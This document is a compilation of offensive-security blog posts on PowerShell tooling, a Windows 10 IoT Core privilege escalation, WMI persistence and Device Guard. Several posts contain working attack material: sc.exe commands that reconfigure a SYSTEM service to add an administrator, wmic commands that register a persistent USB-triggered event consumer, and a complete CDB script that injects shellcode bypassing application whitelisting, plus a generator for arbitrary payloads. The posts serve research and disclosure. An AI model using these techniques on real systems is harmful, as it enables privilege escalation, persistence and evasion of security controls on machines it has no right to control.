The PowerSploit Manifesto

22 December 2015 at 13:30
It’s been a long journey. After so many years of learning PowerShell, starting to learn better software engineering disciplines, developing a large, open-source, offensive PowerShell project, using it in the field, and observing how others use it in the field, I feel compelled to provide a clearer vision for the direction in which I’d like to see PowerSploit go. Before I delve into what my vision is and the rationale for it, let’s get some perspective on a few things.

The PowerShell Capabilities Matrix

I think the offensive usage of PowerShell can be bucketed into the following non-mutually exclusive categories:

  1. You primarily use the benefits of PowerShell (e.g. facilitation of memory residence) to supplement a mostly non-PowerShell workflow. In other words, your workflow consists primarily of leveraging an existing framework like Metasploit, Empire, Cobalt Strike, etc. to seamlessly build and deliver payloads, irrespective of the language used to implement the payload.
  2. You recognize the value of PowerShell for conducting many phases of an operation in a Windows environment. You're not a tool developer, but you need a large offensive library to choose from that can be tailored to your engagement.
  3. You are a capable PowerShell tool developer and operator for whom modularity of the toolset is crucial because your operations are extremely tailored to a specific environment where stealth and operational effectiveness are paramount.

Mattifestation Goal #1: To build a library of capabilities catered to #3 that can ultimately trickle down to #1.

Operational Requirements and Design Challenges

Consider the following requirement from your Director of Offensive Operations:

Objective: We need the ability to capture the credentials of a target and not get caught doing so.

Let’s pretend that such a capability doesn’t exist yet. Two things were explicitly asked of us: 1) Capture target credentials and 2) don’t get caught.

The operations team leads get together and brainstorm how to achieve the director’s relatively vague objective. Each team lead knows that they all have unique operational constraints depending on the target so they come up with the following requirements for the developers:

  1. Mimikatz has proved to be an extremely effective tool for capturing credentials but we worry about it getting flagged by AV so we need you to load it in memory.
  2. Depending on the firewall restrictions and listening services on a target, multiple comms protocols will be required to both deploy Mimikatz and get its results back to the operator. We need to be prepared for whatever the target throws at us.
  3. Because we’ll be dealing with sensitive data, we need to encrypt the Mimikatz results.

The developer, being a huge PowerShell fanboy, has convinced the director and ops leads that PowerShell can accomplish every one of these goals, all while keeping everything memory resident.

So the developer now has some basic requirements necessary to knock out the objectives of the ops team leads and director. The decision then becomes: how should all of the implemented capabilities be packaged?

The developer could develop a “one size fits all” solution that encompasses all of the requirements into a single function – let’s call it Get-AllTheCreds. Such a tool would be great. It would give the operators everything they need in a simple, already pre-weaponized package. Problem solved. They now have an effective credential harvesting capability that works over multiple protocols. Everyone is happy. That is, until the director dictates a new requirement: we need the ability to steal files from a target without getting caught…

After a while, as the requirements grow, the developers quickly learn that development of the “one size fits all” solutions that their operators have loved isn’t going to scale. Instead, the developer proposes writing the following tools that can be stitched together as the ops lead sees fit:

Payload delivery
Invoke-Command - for WinRM payload deployment
Invoke-WmiCommand - for WMI payload deployment

Optional communications functionality
Send-TCPData
Send-UDPData
Send-ICMPData
Send-DropboxData
Receive-TCPData
Receive-UDPData
Receive-ICMPData
Receive-DropboxData

In-memory PE loader used to load Mimikatz or any other PE
Invoke-ReflectivePEInjection

Data encryption
Out-EncryptedText

This approach scales really well: it allows a developer to create and test each unit of functionality independently, resulting in more modular and more reliable code, and it enables the operator to leverage only the minimal amount of functionality needed to carry out a targeted operation. At the same time, though, it places an additional burden upon the operator: they are now required to decide which functions to include in their weaponized payload.

Mattifestation Goal #2: As one of the core developers of PowerSploit, I don't want to be in the game of deciding how people use PowerShell to carry out their operations. Rather, I want to be in the game of providing an arsenal of capabilities to the decision maker.

This decision has led to some discontent amongst those who want a fully pre-weaponized product, and understandably so. Up until this point, the tools in PowerSploit haven’t had any dependencies. The problem as a developer is that this doesn’t scale if PowerSploit is to grow, and it leaves the developer of the capabilities inferring what the “one size fits all” solution might be.

The Good ol’ Days...

Mattifestation Goal #3: Do your best to not alienate your existing user base and don't force them to resolve complicated dependencies.

Goal #3 is where the challenge lies in trying to cater to everyone. I want to modularize everything in PowerSploit, but doing so would leave many users frustrated trying to ensure that they have all the dependencies they need. So what @harmj0y and I propose is the following:

  1. Modularize everything in PowerSploit. As in, make it a proper PowerShell module. Those who use it as a module won't have any dependencies to worry about because PowerShell modules are designed to resolve all dependencies. Modules are a beautiful thing in PowerShell for those who aren’t aware. They just aren’t feasible for in-memory weaponization.
  2. Most people in the business of using offensive PowerShell won’t use PowerSploit as a module on their target. Frameworks like Empire, Cobalt Strike, etc. that offer PowerShell weaponization will need a way to resolve and merge dependencies prior to payload deployment. For functions that require dependencies, we will include a machine-parsable list of required dependencies (see the sketch following this list). These won’t be external dependencies but merely a list of PowerSploit functions required by another PowerSploit function. We have made the decision that we will never require any dependencies not present in PowerSploit.
  3. People will likely want to use PowerSploit functions outside of a formal framework, so for those people, we will provide dependency resolution scripts written in both PowerShell (e.g. Get-WeaponizedPayload) and Python that perform the tasks that follow. Providing this capability, while adding a mandatory step for users, will solve the dependency issue and ensure that the produced script includes only the required functionality.
    1. Take a list of PowerSploit functions and generate a script that includes all of them with their required dependencies merged
    2. Generate a script that includes all functions and merged dependencies from a specified submodule – e.g. the Recon submodule which includes PowerView
    3. Take a script or scriptblock as input, parse it, and prepend any dependencies to a resulting output script
  4. We’re still debating how this solution would scale, but the idea would be to also include a “release build” that includes all of the resolved dependencies for many of the most popular PowerSploit functions/submodules. An example of how this doesn’t scale well is PowerView. PowerView relies upon the PSReflect library for calling Win32 API functions. PSReflect is a fairly sizeable chunk of code, so would you want to include it in every single PowerView function? That would result in unnecessary bloat. You could instead prepend the PSReflect library to all of the PowerView functions, but then you get everything together as one large package – and what if you only want to deploy a couple of PowerView functions? This is just one of several reasons why I don’t think this option would scale, but perhaps we could use it to throw a bone to those content with “the way things were” for a period of time.
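
To make the dependency metadata concrete, here is a minimal sketch of what a machine-parsable dependency header and a naive resolver might look like. The header format and the Resolve-Dependency function are hypothetical illustrations of the idea, not the final PowerSploit implementation:

<#
Required Dependencies: PSReflect
Optional Dependencies: None
#>

function Resolve-Dependency {
    param([String] $FunctionPath)

    # Pull the comma-separated function list out of the header comment.
    $Match = Select-String -Path $FunctionPath -Pattern 'Required Dependencies: (.*)' |
        Select-Object -First 1

    if ($Match) {
        $Match.Matches[0].Groups[1].Value -split ',\s*' |
            Where-Object { $_ -and ($_ -ne 'None') }
    }
}

A weaponization script would recursively resolve this list for each requested function and prepend the resulting unique set of function definitions to the output payload.
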
The Future

We intend to incorporate these changes in the next major release of PowerSploit. By incorporating these proposed changes, what you'll see is a large increase in the code base and, hopefully, reduced dwell time in the acceptance of new pull requests and issue handling. For example, I was reluctant to accept any new wrappers for Invoke-ReflectivePEInjection due to duplicate code being sprayed all over the place. Also, this more modular design paradigm will allow PowerSploit developers to focus on developing unique comms functionality independent of other capabilities. By moving forward with these changes, I can say that I will personally remain dedicated to moving PowerSploit forward, and I hope that my enthusiasm will rub off on those wanting to contribute, those wanting to weaponize these capabilities, and those just wanting to excel at their tradecraft. Lastly, you'll begin to hear me make more of a concerted effort to brand PowerSploit as an "offensive capabilities library" versus a framework; nor should PowerSploit be considered a "pentest tool." Metasploit and Cobalt Strike are frameworks that weaponize and deploy payloads irrespective of the language used on the target. PowerSploit is a language-specific library that aims to empower the operator who has warmly welcomed PowerShell into their methodology.

As a final thought and plea, it is my expectation and hope that all pentesters and red teamers learn PowerShell. It is a required skill for so many reasons, many of which I’ve outlined here. Stop putting it off! Do effective pentesters and red teamers in a Linux environment get away without knowing simple bash scripting and command-line usage? No! So the next time you’re in a situation with some hacker buddies where you have hands on a machine and want to impress, are you going to choose the black screen or the blue screen???

Properly Retrieving Win32 API Error Codes in PowerShell

1 January 2016 at 20:38
Having worked with Win32 API functions enough in PowerShell using P/Invoke and reflection, I was constantly annoyed by the fact that I was often unable to capture the correct error code from a function that sets its error code (by calling SetLastError) prior to returning to the caller, despite setting SetLastError to True in the DllImportAttribute.


Consider the following, simple code that calls CopyFile within kernel32.dll:


$MethodDefinition = @'
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool CopyFile(string lpExistingFileName, string lpNewFileName, bool bFailIfExists);
'@

$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -Namespace 'Win32' -PassThru

# Perform an invalid copy
$CopyResult = $Kernel32::CopyFile('C:\foo2', 'C:\foo1', $True)

# Retrieve the last error for CopyFile. The following error is expected:
# "The system cannot find the file specified"
$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()

# An incorrect error is retrieved:
# "The system could not find the environment option that was entered"
# Grrrrrrrrrrrrrrrrr...
$LastError


I knew that you needed to retrieve the last error code immediately after a call to a Win32 function so, naturally, I would have expected the correct error code. The one returned was consistently nonsensical, however. I don’t really know how I thought to try the following, but I finally figured out how to properly capture the correct error code after an unmanaged function call – capture the error code on the same line (i.e. immediately after a semicolon). Apparently, the simple act of progressing to the next line in a PowerShell console is enough for your thread to set a different error code – presumably because the PowerShell engine itself makes additional Win32 calls between statements, clobbering the thread’s last-error value…


The following code demonstrates how to accurately capture the last set error code:


$MethodDefinition = @'
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool CopyFile(string lpExistingFileName, string lpNewFileName, bool bFailIfExists);
'@

$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -Namespace 'Win32' -PassThru

# Perform an invalid copy and capture the last error code on the same line
$CopyResult = $Kernel32::CopyFile('C:\foo2', 'C:\foo1', $True);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()

# The correct error is retrieved:
# "The system cannot find the file specified"
# Yayyyyyyyyyyy....
$LastError


That’s all. I felt it was necessary to share this as I’m sure others have encountered this issue and were unable to find any solution on the Internet as it pertained to PowerShell.


Happy New Year!

Misconfigured Service ACL Elevation of Privilege Vulnerability in Win10 IoT Core Build 14393

25 July 2016 at 12:20
As of this writing, the latest public preview of Windows 10 IoT Core (build 14393) suffers from an elevation of privilege vulnerability via a misconfigured service ACL. The InputService service, which runs as SYSTEM, grants authenticated users (i.e. members of the “NT AUTHORITY\Authenticated Users” group) SERVICE_ALL_ACCESS access rights, allowing an unprivileged, authenticated user to change the binary path of the service and gain elevated code execution upon restarting the service.

For reference, you can validate that InputService runs as SYSTEM with the following commands:

$InputService = Get-CimInstance -ClassName Win32_Service -Filter 'Name = "InputService"'
$InputService.StartName
Get-CimInstance -ClassName Win32_Process -Filter "ProcessId=$($InputService.ProcessId)" | Invoke-CimMethod -MethodName GetOwner

This trivial vulnerability was discovered while running the Get-CSVulnerableServicePermission function in CimSweep against an IoT Core instance running on my Raspberry Pi 2. CimSweep is designed to perform incident response and hunt operations entirely over WMI/CIM.

Exploitation

I wrote a proof of concept exploit that simply adds an unprivileged user to the Administrators group.

While this is a classic service misconfiguration vulnerability, there are several caveats to be mindful of when exploiting it on Win 10 IoT Core. First of all, IoT Core is designed to be managed remotely and for that, you are given two remote management options: PowerShell Remoting and SSH. I chose to use PowerShell Remoting in my PoC exploit primarily to point out that the default SDDL for PowerShell Remoting in IoT Core requires that users be members of the “Remote Management Users” group. Additional information on administering IoT Core with PowerShell can be found here. For reference, the default SDDL for PowerShell Remoting can be obtained and interpreted with the following command:

Get-PSSessionConfiguration -Name microsoft.powershell | Select-Object -ExpandProperty Permission

There is no such group membership requirement for SSH. Hopefully, at a future point, SSH endpoints on Windows will have the granular security controls that PowerShell Remoting offers via the PSSessionConfiguration cmdlets. Some additional caveats were that when I remoted in as an unprivileged user, I did not have sufficient privileges to use the Service cmdlets (Get-Service, Set-Service, etc.) or CIM cmdlets (Get-CimInstance, Invoke-CimMethod, etc.) in order to change the service configuration. Fortunately, sc.exe presented no such restrictions.
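
For reference, the core of such a PoC reduces to the classic service reconfiguration technique sketched below. This is an illustrative sketch rather than the exact PoC: 'lowpriv' is a placeholder account name, and note the mandatory space after "binpath=". The service start will report an error because cmd.exe is not a real service binary, but the command still executes as SYSTEM first.

sc.exe config InputService binpath= "cmd.exe /c net localgroup Administrators lowpriv /add"
sc.exe stop InputService
sc.exe start InputService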

Conclusion

While this is by no means a “sexy” vulnerability, the fact that such a trivial vulnerability was present in a modern Windows OS tells me that perhaps Win 10 IoT Core isn’t getting the security scrutiny of other Windows operating systems. I hope that many of the same security controls and mitigations will eventually be applied to IoT Core if the plan is for this to be the operating system that drives critical infrastructure.

Lastly, if you’re attending Black Hat USA 2016, you should plan on attending Paul Sabanal’s (@polsab) talk on Windows 10 IoT Core!

Disclosure Timeline

May 22, 2016 – Vulnerability reported to MSRC
May 23, 2016 – MSRC opened a case number for the issue
July 20, 2016 – Follow-up email sent to MSRC asking for a status update; no response received
July 25, 2016 – Decision made to release the vulnerability details

WMI Persistence using wmic.exe

12 August 2016 at 15:57
Until recently, I didn’t think it was possible to perform WMI persistence using wmic.exe, but after some experimentation, I finally figured it out. To date, WMI persistence via dropping MOF files or by using PowerShell has been fairly well documented, but documentation on performing this with wmic.exe doesn’t seem to exist. I won’t get into the background of WMI persistence in this article as the concepts are articulated clearly in the two previous links. The challenge in using wmic.exe to perform WMI persistence is that creating an instance of the __FilterToConsumerBinding class requires references to an existing __EventFilter and __EventConsumer. It turns out that you can reference existing WMI objects in wmic.exe using the syntax provided in a WMI object’s __RELPATH property! Okay. Enough theory. Let’s dive into an example.


In this example, we’re going to use wmic.exe to create a PoC USB drive infector that will immediately drop the EICAR string to eicar.txt in the root folder of any inserted removable media.


1) Create an __EventFilter instance.


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="VolumeArrival", QueryLanguage="WQL", Query="SELECT * FROM Win32_VolumeChangeEvent WHERE EventType=2"


2) Create an __EventConsumer instance. CommandLineEventConsumer in this example.


wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="InfectDrive", CommandLineTemplate="powershell.exe -NoP -C [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=')) | Out-File %DriveName%\eicar.txt"


3) Obtain the __RELPATH of the __EventFilter and __EventConsumer instances. This built-in system property provides the object instance syntax needed when creating a __FilterToConsumerBinding instance.


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list
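
The /FORMAT:list output should resemble the following (inferred from the instance names created above); these values are exactly the reference syntax consumed in the next step:

__RELPATH=__EventFilter.Name="VolumeArrival"
__RELPATH=CommandLineEventConsumer.Name="InfectDrive"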


4) Create a __FilterToConsumerBinding instance. The syntax used for the Filter and Consumer properties came from the __RELPATH properties in the previous step.


wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"VolumeArrival\"", Consumer="CommandLineEventConsumer.Name=\"InfectDrive\""


At this point, the USB drive infector is registered and running!


5) Optional: Remove all instances - i.e. unregister the permanent WMI event subscription.


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="VolumeArrival" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="InfectDrive" DELETE


So that’s all there is to it! Hopefully, this will be a useful tool to add to your offensive WMI arsenal!

Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner

15 August 2016 at 14:16
Imagine you’ve gained access to an extremely locked down Windows 10 host running Device Guard. The Device Guard policy is such that all PEs (exe, dll, sys, etc.) must be signed by Microsoft. No other signed code is authorized. Additionally, a side effect of Device Guard being enabled is that PowerShell will be locked down in constrained language mode so arbitrary code execution is ruled out in the context of PowerShell (unless you have a bypass for that, of course). You have a shellcode payload you’d like to execute. What options do you have?


You’re an admin. You can just disable Device Guard, right? Nope. The Device Guard policy is signed and you don’t have access to the code signing cert to sign and plant a more permissive policy. To those who want to challenge this claim, please go forth and do some Device Guard research and find a bypass. For us mere mortals though, how can we execute our shellcode considering we can’t just disable Device Guard?


The obvious solution dawned on me recently: I simply asked myself, “what is a tool that’s signed by Microsoft that will execute code, preferably in memory?” WinDbg/CDB of course! I had used WinDbg a million times to execute shellcode for dynamic malware analysis but I never considered using it as a generic code execution method for malware in a signed process. Now, in order to execute a shellcode buffer, there are generally three requirements to get it to execute in any process:


1) You need to be able to allocate at least RX memory for it. In reality, though, you’ll need RWX memory if the shellcode is self-modifying – i.e. any encoded Metasploit shellcode.

2) You need a mechanism to copy the shellcode buffer to the allocated memory.

3) You need a way to direct the flow of execution of a thread to the shellcode buffer.


Fortunately, WinDbg and CDB have commands to achieve all of this.


1)  .dvalloc [Size of shellcode]


Allocates a page-aligned RWX buffer of the size you specify.


2)  eb [Shellcode address] [Shellcode byte]


Writes a byte to the address specified.


3)  r @$ip=[Shellcode address]


Points the instruction pointer to the address specified. Note: $ip is a generic, pseudo register that refers to EIP, RIP, or PC depending upon the architecture (x86, amd64, and ARM, respectively).


With those fundamental components, we have pretty much everything we need to implement a WinDbg or CDB shellcode runner. The following proof-of-concept example will launch 64-bit shellcode (pops calc) in notepad.exe. To get this running, just save the text to a file (I named it x64_calc.wds) and launch it with the following command: cdb.exe -cf x64_calc.wds -o notepad.exe


$$ Save this to a file - e.g. x64_calc.wds
$$ Example: launch this shellcode in a host notepad.exe process.
$$ cdb.exe -cf x64_calc.wds -o notepad.exe

$$ Allocate 272 bytes for the shellcode buffer
$$ Save the address of the resulting RWX in the pseudo $t0 register
.foreach /pS 5  ( register { .dvalloc 272 } ) { r @$t0 = register }

$$ Copy each individual shellcode byte to the allocated RWX buffer
$$ Note: The `eq` command could be used to save space, if desired.
$$ Note: .readmem can be used to read a shellcode buffer too but
$$   shellcode on disk will be subject to AV scanning.
;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4
;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00
;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51
;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51
;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2
;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52
;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52
;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52
;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72
;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7
;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31
;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0
;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C
;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41
;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41
;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED
;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48
;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B
;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01
;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88
;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48
;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67
;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50
;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44
;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49
;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56
;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41
;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48
;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31
;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0
;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9
;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1
;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1
;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24
;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1
;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44
;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49
;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41
;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44
;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49
;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B
;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01
;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41
;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A
;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59
;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83
;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52
;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41
;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B
;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF
;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48
;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00
;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00
;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D
;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00
;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B
;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5
;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A
;eb @$t0+E8 0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6
;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF
;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4
;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C
;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0
;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47
;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A
;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89
;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63
;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00

$$ Redirect execution to the shellcode buffer
r @$ip=@$t0

$$ Continue program execution - i.e. execute the shellcode
g

$$ Continue program execution after hitting a breakpoint
$$ upon starting calc.exe. This is specific to this shellcode.
g

$$ quit cdb.exe
q


I chose to use cdb.exe in the example as it is a command-line debugger, whereas WinDbg is a GUI debugger. Additionally, these debuggers are portable: they import DLLs that are all present in System32. So the only files you would be dropping on the target system are cdb.exe and the script above – none of which should be flagged by AV. In reality, the script isn’t even required on disk. You can just paste the commands in manually if you like.
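
If you want to produce a script like the one above for an arbitrary payload, a few lines of PowerShell will emit the eb commands for you. This is a hypothetical generator, assuming your raw shellcode lives at C:\payload.bin (a placeholder path); redirect its output to a .wds file:

# Hypothetical generator: emit a CDB script body for an arbitrary shellcode file.
$Shellcode = [IO.File]::ReadAllBytes('C:\payload.bin')

# Allocate an RWX buffer of the proper size and stash its address in $t0.
".foreach /pS 5  ( register { .dvalloc $($Shellcode.Length) } ) { r @`$t0 = register }"

# Emit the eb commands, four bytes per line.
for ($i = 0; $i -lt $Shellcode.Length; $i += 4) {
    $Line = ''
    foreach ($j in $i..([Math]::Min($i + 3, $Shellcode.Length - 1))) {
        $Line += ';eb @$t0+{0:X2} {1:X2}' -f $j, $Shellcode[$j]
    }
    $Line
}

# Redirect execution to the buffer and resume.
'r @$ip=@$t0'
'g'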


Now, you may be starting to ask yourself, “how could I go about blocking windbg.exe, cdb.exe, kd.exe etc.?“ You might block the hashes from executing with AppLocker. Great, but then someone will just run an older version of any of those programs and it won’t block future versions either. You could block anything named cdb.exe, windbg.exe, etc. from running. Okay, then the attacker will just rename it to foo.exe. You could blacklist the certificate used to sign cdb.exe, windbg.exe, etc. Then you might be blocking other legitimate Microsoft applications signed with the same certificate. On Windows RT, this attack was somewhat mitigated by the fact that user-mode code integrity (UMCI) prevented a user from attaching a debugger invasively – what I did in this example. The ability to enforce this with Device Guard, however, does not present itself as a configuration feature. At the time of this writing, I don’t have any realistic preventative defenses but I will certainly be looking into them as I dig into Device Guard more. As far as detection is concerned, there ought to be plenty of creative ways to detect this including something as simple as command-line auditing.



Anyway, while this may not be the sexiest of ways to execute shellcode, I’d like to think it’s a decent, generic application whitelisting bypass that will be difficult in practice to prevent. Enjoy!

Introduction to Windows Device Guard: Introduction and Configuration Strategy

6 September 2016 at 14:24

Introduction

Welcome to the first in a series of Device Guard blog posts. This post is going to cover some introductory concepts about Device Guard and detail the relatively aggressive strategy that I used to configure it on my Surface Pro 4 tablet running a fresh install of Windows 10 Enterprise Anniversary Update (1607). The goal of this introductory post is to start getting you comfortable with Device Guard and experimenting with it yourselves. In subsequent posts, I will describe various bypasses and methods to effectively mitigate each one. The ultimate goal of this series of posts is to educate readers about the strengths and current weaknesses of what I consider to be an essential technology in preventing a massive class of malware infections in a post-compromise scenario (i.e. exploit mitigation is another subject altogether).


Device Guard Basics

Device Guard is a powerful set of hardware and software security features available in Windows 10 Enterprise and Server 2016 (including Nano Server, with caveats that I won’t explain in this post) that aims to block the loading of drivers, user-mode binaries (including DLLs), MSIs, and scripts (PowerShell and Windows Script Host - vbs, js, wsf, wsc) that are not explicitly authorized per policy. In other words, it’s a whitelisting solution. The idea, in theory, is to provide a means of preventing arbitrary unsigned code execution (excluding remote exploits). Right off the bat, you may already be asking, “why not just use AppLocker and why is Microsoft recreating the wheel?” I certainly had those questions and I will attempt to address them later in the post.


Device Guard can be broken down into two primary components:


1 - Code integrity (CI)

The code integrity component of Device Guard enforces both kernel mode code integrity (KMCI) and user mode code integrity (UMCI). The rules enforced by KMCI and UMCI are dictated by a code integrity policy - a configurable list of whitelist rules that can apply to drivers, user-mode binaries, MSIs, and scripts. Now, technically, PowerShell scripts can still execute, but unless a script or module is explicitly allowed via the code integrity policy, it will be forced to execute in constrained language mode, which prevents a user from calling Add-Type, instantiating .NET objects, and invoking .NET methods, effectively precluding PowerShell from being used to gain any form of arbitrary unsigned code execution. Additionally, WSH scripts will still execute if they don't comply with the deployed code integrity policy, but they will fail to instantiate any COM objects, which is reasonable considering unsigned PowerShell will still execute, but in a very limited fashion. As of this writing, the script-based protections of Device Guard are not documented by Microsoft.
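
To make constrained language mode concrete, here is what an unsigned interactive session looks like under an enforced policy. This is an illustrative sketch; the exact error text varies by build:

# Check the language mode the session is running in:
$ExecutionContext.SessionState.LanguageMode    # ConstrainedLanguage

[Math]::Sqrt(2)    # Fails: method invocation is limited to core types
New-Object Net.WebClient    # Fails: only core types may be instantiated
Add-Type -TypeDefinition 'public class Foo {}'    # Fails: Add-Type is blocked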

So with a code integrity policy, for example, if I wanted my system to only load drivers or user-mode code signed by Microsoft, such rules would be stated in my policy. Code integrity policies are created using the cmdlets present in the ConfigCI PowerShell module. CI policies are configured as a plaintext XML document then converted to a binary-encoded XML format when they are deployed. For additional protections, CI policies can also be signed with a valid code-signing certificate.


2 - Virtualization-based Security (VBS)

Virtualization-based Security comprises several hypervisor and modern hardware-based security features that are used to protect the enforcement of a code integrity policy, Credential Guard, and shielded VMs. While it is not mandatory to have hardware that supports VBS features, without it, the effectiveness of Device Guard will be severely hampered. Without delving into too much detail, VBS will improve the enforcement of Device Guard by attempting to prevent even an elevated user without physical access to the target from disabling code integrity enforcement. It can also prevent DMA-based attacks and restrict any kernel code from creating executable memory that isn’t explicitly conformant to the code integrity policy. Microsoft’s official Device Guard documentation (referenced below) elaborates further on VBS.



Microsoft provides a Device Guard and Credential Guard hardware readiness tool that you should use to assess which hardware-specific components of Device Guard and/or Credential Guard can be enabled. This post does not cover Credential Guard.


Configuration Steps and Strategy

